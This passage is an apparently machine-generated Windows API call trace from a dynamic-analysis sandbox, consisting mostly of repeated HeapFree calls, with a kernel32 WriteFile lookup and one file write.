hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0173.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0173.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0173.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0173.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0173.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0173.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0173.365] FreeLibrary (hLibModule=0x75990000) returned 1 [0173.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0173.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0173.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0173.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0173.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0173.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0173.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0173.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0173.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0173.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0173.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0173.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0173.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0173.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0173.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0173.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0173.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0173.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0173.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0173.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0173.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0173.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0173.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0173.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0173.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0173.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0173.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0173.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0173.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0173.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0173.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0173.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0173.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0173.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0173.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0173.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0173.367] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0173.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0173.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0173.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0173.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0173.367] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0173.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0173.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0173.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0173.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0173.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0173.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0173.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0173.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0173.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0173.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0173.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0173.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0173.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0173.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0173.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0173.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0173.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0173.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0173.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0173.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0173.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0173.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0173.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0173.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0173.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0173.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0173.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0173.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0173.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0173.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0173.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0173.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0173.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0173.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0173.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0173.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0173.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0173.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0173.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0173.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0173.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0173.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0173.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0173.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0173.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0173.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0173.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0173.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0173.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0173.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0173.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0173.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0173.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0173.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0173.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0173.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0173.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0173.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0173.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0173.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0173.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0173.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0173.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0173.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0173.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0173.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0173.370] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.370] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0173.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0173.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0173.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0173.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0173.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0173.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0173.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0173.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0173.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0173.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0173.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0173.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0173.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0173.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0173.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0173.370] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0173.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0173.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0173.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0173.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0173.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0173.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0173.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0173.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0173.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0173.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0173.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0173.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0173.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0173.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0173.371] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0173.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0173.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0173.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0173.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0173.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0173.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0173.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0173.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0173.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0173.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0173.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0173.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0173.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0173.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0173.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0173.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0173.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0173.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0173.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0173.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0173.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0173.372] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0173.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0173.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd3a8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0173.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0173.373] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0173.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0173.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0173.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0173.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0173.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0173.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0173.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0173.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0173.373] WriteFile (in: hFile=0x138, lpBuffer=0xa5f008*, nNumberOfBytesToWrite=0xce08, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesWritten=0x87eae0*=0xce08, lpOverlapped=0x0) returned 1 [0173.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0173.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0173.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0173.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0173.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0173.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0173.374] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: 